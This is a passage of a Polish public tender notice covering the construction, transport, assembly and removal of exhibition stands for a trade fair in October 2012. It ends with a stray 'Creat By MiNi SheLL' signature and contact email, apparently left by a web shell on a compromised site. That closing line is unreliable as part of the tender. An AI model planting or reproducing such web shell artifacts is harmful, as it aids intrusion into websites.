e) punkt świetlny - halogen o mocy min. 150W,
f) gniazdo elektryczne o mocy 230V,
g) wyposażenie dodatkowe na każdym stoisku: 1 kosz na śmieci, dwa krzesła plastikowe, stolik plastikowy (wszystkie krzesła i stoliki w takim samym kolorze),
h) dodatkowo Wykonawca powinien w czasie wydarzenia dysponować 15 dodatkowymi krzesłami plastikowymi (w takim samym kolorze jak krzesła na stoiskach) które będą do dyspozycji wystawców.  
Wszystkie materiały zabudowy stoisk oraz wyposażenia dodatkowego muszą posiadać wymagane atesty i certyfikaty bezpieczeństwa. 
Wykonawca pozostanie właścicielem elementów zabudowy i materiałów wykorzystanych do wykonania zabudowy, które są tylko użyczane Zamawiającemu. 
Wykaz wystawców (nazwy firm) do przygotowania fryzów zostanie przekazany Wykonawcy w formie elektronicznej do dnia 03.10.2012r
Zamawiający zobowiązuje się do poinformowania wystawców biorących udział w targach o zakazie dokonywania trwałych zmian na stoiskach wystawowych, takich jak np. nawiercanie konstrukcji stoiska lub używanie taśmy dwustronnej do naklejania materiałów na stoisko a także zakazie podłączania do gniazd elektrycznych urządzeń o dużym poborze prądu (takich jak czajniki elektryczne itp.). 
2. Transport elementów zabudowy i materiałów do miejsca odbywania Targów i do magazynu/ siedziby Wykonawcy po zakończeniu prac.  
3. Montaż zabudowy w dniu 10.10.2012r. w Bielskim Centrum Kształcenia Praktycznego 
i Ustawicznego (aula i korytarz na parterze) - rozpoczęcie prac będzie możliwe od godz. 15:30 i zakończy się nie później niż w dniu 11.10.2012 r. do godz. 7.00. 
Demontaż w dniu 11.10.2012r. po zakończeniu Targów (rozpoczęcie prac będzie możliwe po godz. 16:00). 
W trakcie wykonywania montażu Wykonawca zobowiązany jest do:
a) systematycznego porządkowania miejsc wykonywania zabudowy, stoisk wystawienniczych, ścian osłonowych oraz terenu wystawowego, na którym postawione były stoiska i pozostawienie go w stanie niepogorszonym, niewykraczającym poza skutki zwykłego używania, 
b) wykonywania wszelkich działań związanych z przedmiotowym zamówieniem zgodnie z przepisami BHP oraz przepisami przeciwpożarowymi, 
c) zagospodarowania odpadów zgodnie z obowiązującymi w tym zakresie przepisami.   
4. Zapewnienie obsługi technicznej w dniu targów w godz. 8:00 - 16:00: 1 specjalista ds. elektryki i oświetlenia oraz 1 specjalista ds. stoisk i zabudowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 79.95.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com